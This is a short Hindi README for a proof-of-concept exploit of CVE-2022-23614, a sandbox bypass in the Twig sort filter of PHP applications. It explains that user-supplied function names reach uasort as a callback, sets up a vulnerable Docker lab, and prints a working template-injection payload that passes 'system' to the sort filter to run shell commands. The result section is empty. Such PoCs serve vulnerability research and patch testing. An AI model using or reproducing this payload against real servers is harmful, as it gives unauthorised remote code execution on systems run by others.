
CVE-2022-23614 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो PHP अनुप्रयोगों में Twig के sort फ़िल्टर सैंडबॉक्स बाईपास के माध्यम से मनमाना कोड निष्पादन प्रदर्शित करता है।
CVE-2022-23614, GHSA-5mv2-rx3q-4w2v के लिए PoC (Twig सॉर्ट फ़िल्टर कोड निष्पादन/सैंडबॉक्स बाईपास)
जैसा कि इस कमिट में देखा गया है - https://github.com/twigphp/Twig/commit/.., twig uasort को कॉलबैक पैरामीटर के रूप में उपयोगकर्ता द्वारा प्रदान किया गया फ़ंक्शन नाम पास कर रहा था (यहाँ), जिसके परिणामस्वरूप मनमाना कोड निष्पादन होता है
एक कमजोर twig संस्करण के साथ डॉकर कंटेनर बनाने और चलाने के लिए
$ ./build-docker.sh
localhost:1337 पर वेबपेज खोलें और निम्नलिखित पेलोड को रेंडर करने का प्रयास करें
{{ ['id','']|sort('system') }}
PoC

परिणाम
